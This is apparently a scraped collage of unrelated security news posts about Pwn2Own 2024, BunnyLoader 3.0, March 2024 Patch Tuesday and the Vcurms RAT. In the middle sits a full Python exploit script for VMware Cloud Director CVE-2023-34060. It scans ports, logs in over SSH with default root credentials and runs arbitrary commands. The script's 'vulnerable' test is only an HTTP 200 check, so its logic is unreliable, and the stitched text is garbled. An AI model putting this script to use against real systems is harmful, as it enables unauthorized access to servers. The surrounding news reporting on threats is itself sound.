Participants will attempt to hack various software on the second day, including VMware Workstation, Oracle VirtualBox, Firefox, Chrome, Edge, Ubuntu, Windows 11, and Docker Desktop. The three-day event is offering a total of $1.3m in cash and prizes.

1.  Whitehat hacker bypasses SQL injection filter for Cloudflare
2.  Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own
3.  White hat hackers infect Canon DSLR camera with ransomware
4.  Whitehat hacker shows how to detect hidden cameras in hotels
5.  White hat hacker infects smart coffee machine with ransomware

Pwn2Own 2024 Awards $700k as Hackers Pwn Tesla, Browsers, and More

By Waqas
Another day, another cybersecurity threat hits unsuspected users!
This is a post from HackRead.com Read the original post: New Malware “BunnyLoader 3.0” Steals Credentials and Crypto

New high-performance malware “BunnyLoader 3.0” steals logins, crypto & lurks undetected. Palo Alto Unit 42 reveals its tricks to help businesses & individuals fight back. Learn how to protect yourself from this evolving cyber threat.

In the scenario where cybersecurity threats are peeking, staying one step ahead of malicious actors is crucial to protecting your online business and identity. Recently, Palo Alto’s Unit 42 released a report shedding light on a dangerous new malware called BunnyLoader, and its latest version, BunnyLoader 3.0. Here’s what you need to know:

****The BunnyLoader Menace:****

BunnyLoader is not your average malware. It’s a sophisticated tool developed by cybercriminals to steal sensitive information, credentials, and even cryptocurrency from unsuspecting victims. What’s more, it’s constantly evolving, making it a challenging threat for the cybersecurity community.

****A Constantly Evolving Threat:****

Since its discovery in September 2023 on **Breach Forums**, BunnyLoader has undergone multiple updates and enhancements, each aimed at outsmarting security measures and staying under the radar of cybersecurity researchers. From bug fixes to advanced keylogging capabilities, the creators of BunnyLoader are constantly tweaking their creation to maximize its effectiveness.

****The Release of BunnyLoader 3.0:****

On February 11, 2024, the threat actors behind BunnyLoader unveiled their latest version, BunnyLoader 3.0, boasting a 90% improvement in performance. This new iteration comes with a reduced payload size and enhanced keylogging capabilities, making it even more dangerous than before.

****Behind the Scenes of BunnyLoader:****

Unit 42’s **technical write-up** provides a glimpse into the inner workings of BunnyLoader, revealing the tactics and techniques used by its creators to evade detection. From changing file names to mimicking legitimate applications, BunnyLoader employs various strategies to stay hidden from cybersecurity experts.

****Protecting Yourself Against BunnyLoader:****

With the threat of BunnyLoader looming large, it’s more important than ever to stay vigilant and take proactive measures to protect yourself and your online assets. By staying informed about the latest cyber threats and implementing robust security measures, you can minimize the risk of **falling victim to malicious actors**.

1.  95.6% of New Malware in 2022 Targeted Windows
2.  SpyNote Android Spyware Poses as Legit Crypto Wallets
3.  Malware Turns Windows, macOS Devices into Proxy Nodes
4.  Mispadu Stealer’s New Variant Targets Browser Data of Mexicans
5.  Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

New Malware “BunnyLoader 3.0” Steals Credentials and Crypto

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.

    # Exploit Title: [VMware Cloud Director | Bypass identity verification]# Google Dork: [non]# Date: [12/06/2023]# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)# Version: [10.5]# CVE : [CVE-2023-34060]import requestsimport paramikoimport subprocessimport socketimport argparseimport threading# Define a function to check if a port is opendef is_port_open(ip, port):    # Create a socket object    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # Set the timeout to 1 second    s.settimeout(1)    # Try to connect to the port    try:        s.connect((ip, port))        # The port is open        return True    except:        # The port is closed        return False    finally:        # Close the socket        s.close()# Define a function to exploit a vulnerable devicedef exploit_device(ip, port, username, password, command):    # Create a ssh client object    client = paramiko.SSHClient()    # Set the policy to accept any host key    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    # Connect to the target using the credentials    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)    # Execute the command and get the output    stdin, stdout, stderr = client.exec_command(command)    # Print the output    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")    # Close the ssh connection    client.close()# Parse the arguments from the userparser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")parser.add_argument("ip", help="The target IP address")parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")parser.add_argument("-u", "--username", default="root", help="The username for ssh")parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")args = parser.parse_args()# Loop through the ports and check for the vulnerabilityfor port in args.ports:    # Check if the port is open    if is_port_open(args.ip, port):        # The port is open, send a GET request to the port and check the status code        response = requests.get(f"http://{args.ip}:{port}")        if response.status_code == 200:            # The port is open and vulnerable            print(f"Port {port} is vulnerable to CVE-2023-34060")            # Create a thread to exploit the device            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))            # Start the thread            thread.start()        else:            # The port is open but not vulnerable            print(f"Port {port} is not vulnerable to CVE-2023-34060")    else:        # The port is closed        print(f"Port {port} is closed")

VMware Cloud Director 10.5 Authentication Bypass

By Waqas
Another day, another malware exploiting cloud services to steal sensitve data from unsuspecting Windows users.
This is a post from HackRead.com Read the original post: New Vcurms Malware Targets Popular Browsers for Data Theft

Cybersecurity researchers at Fortinet’s FortiGuard Labs have discovered a new threat called Vcurms malware targeting popular browsers and apps for login and data theft. They urge security updates and caution with emails.

Fortinet’s FortiGuard Labs recently uncovered a new cybersecurity threat: a malware known dubbed “Vcurms.” The attackers behind Vcurms malware have employed sophisticated tactics, using email as their command and control center and leveraging public services such as AWS and GitHub to store the malicious software. Additionally, they have employed a commercial protector to evade detection, indicating a concerted effort to maximize the malware’s impact.

****Targeting Java Platforms****

This campaign primarily targets platforms with Java installed, posing a risk to any organization utilizing such systems. The severity of the threat cannot be understated, as successful infiltration grants attackers full control over compromised systems.

****Tactics and Techniques: Spreading Vcurms****

The modus operandi of the attackers involves luring users to download a malicious Java downloader, which serves as a vector for spreading Vcurms and STRRAT, a trojan previously found to be **posing as fake ransomware infection** to steal data. These malicious emails typically masquerade as legitimate requests, urging recipients to verify payment information and download harmful files hosted on AWS.

****Phishing Traits****

Once downloaded, the malware exhibits classic phishing traits, employing spoofed names and obfuscated strings to disguise its nefarious nature. Notably, it utilizes a class named “DownloadAndExecuteJarFiles.class” to facilitate the downloading and execution of additional JAR files, further expanding the attacker’s foothold.

The Remote Access Trojan (**RAT**) component of Vcurms communicates with its command and control center via email, demonstrating a concerning level of sophistication. It establishes persistence by replicating itself into the Startup folder and employs various techniques to identify and monitor victims, including keylogging and password recovery functionalities.

****Targeting Popular Browsers and Apps****

Furthermore, the malware employs advanced obfuscation techniques, such as the **Branchlock obfuscator**, to evade detection and analysis. Despite these challenges, cybersecurity researchers continue to develop methods for deobfuscating and understanding the inner workings of Vcurms.

Vcurms also exhibits notable similarities with the **Rude Stealer malware** but distinguishes itself through its unique transmission methods and targeted data acquisition. It prioritizes stealing sensitive information from popular browsers like Chrome, Brave, Edge, Vialdi, Opera, OperaGX, Firefox, etc. and applications, including Discord and Steam.

In response to this threat, FortiGuard Labs in their **blog post**, recommend proactive measures, including the deployment of updated security solutions and network segmentation. Additionally, maintaining vital password practices and exercising caution when handling email attachments are crucial steps in mitigating the risk of Vcurms infection.

Commenting on this, **Jason Soroko**, Senior Vice President of Product at Sectigo, emphasizes the importance of authentication methods in combating malware attacks.

_“_Malware writers are benefiting from the cloud and that shouldn’t surprise anyone. RAT malware typically harvests whatever it can, and the new VCURMS and STRRAT remote access trojans seem to have one or more keyloggers,_“_ Jason warned. _“_This technique has been around for quite some time and is yet another example of why stronger authentication methods than simply a username and password are necessary._“_

1.  ToxicEye RAT hits Telegram app to spy, steal user data
2.  Fake Skype, Zoom, Google Meet Sites Infecting Devices with RATs
3.  AsyncRAT Infiltrates Key US Infrastructure Through GIFs and SVGs
4.  BRATA Android malware factory resets phones after stealing funds
5.  New Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

Tag

#vmware